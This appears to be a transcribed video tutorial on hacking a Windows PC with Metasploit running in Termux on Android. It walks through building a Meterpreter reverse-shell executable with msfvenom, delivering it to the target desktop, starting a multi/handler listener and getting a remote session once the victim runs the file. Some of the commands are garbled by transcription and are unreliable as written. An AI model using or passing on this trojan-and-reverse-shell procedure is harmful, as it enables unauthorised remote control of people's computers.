Welcome back to my video. In this video, we are going to learn how to hack the Windows PC by using Metasploit on your Android Terminx. So, in the previous video, you saw how to hack the Android device by using Metasploit on your Android Terminx. So now, by using Metasploit, I am going to hack my Windows PC. Now, entering into my folder by typing cd Metasploit framework and next ls. So here you can see some of the files and folders which are used to create a payload and also exploit the Windows PC. Now creating a payload by typing ./msfvmo p. P is used for plugins. Next Windows/meterpreter/reverse and entering my L host, that is 192.168.1. Next, setting up the L port, that is default 4444. Next, exe, giving the path to store my exe file /sd card /windows.exe, and then pressing enter. I am going to wait for a while. It's going to create a payload. Okay, now it has created a payload with the name of windows.exe and the file size is 73802 bytes. This is similar how you create a payload in your Linux operating system. Coming back to my screen, going to my file manager, here you can see the windows.exe file, that is payload. Now I am going to send it to my Windows desktop. Here you can see the file on my Windows desktop. So next, opening the new session in my Android Terminx, typing cd Metasploit framework and next typing ls. Now I am going to load the MSF console by typing ./MSF console. Here I am going to use exploitation models to exploit Windows PC. Okay, now typing use exploit /multi/handler. Next, setting up the payload by typing set payload windows/meterpreter/reverse and next setting up the L host, set L host 192.168.1.1 and setting up the L port 4444. At last, typing exploit. Now I am going to my Windows desktop, double clicking on exe file, that is payload. Coming back to my Android Terminx, here I got the interpreter session and now I am going to type system info. Okay, now here you can see the system information which is showing that is Windows 7 and my PC name. So this is how you are going to hack the Windows PC by using Metasploit in your Android Terminx. That's all in this video. Thank you.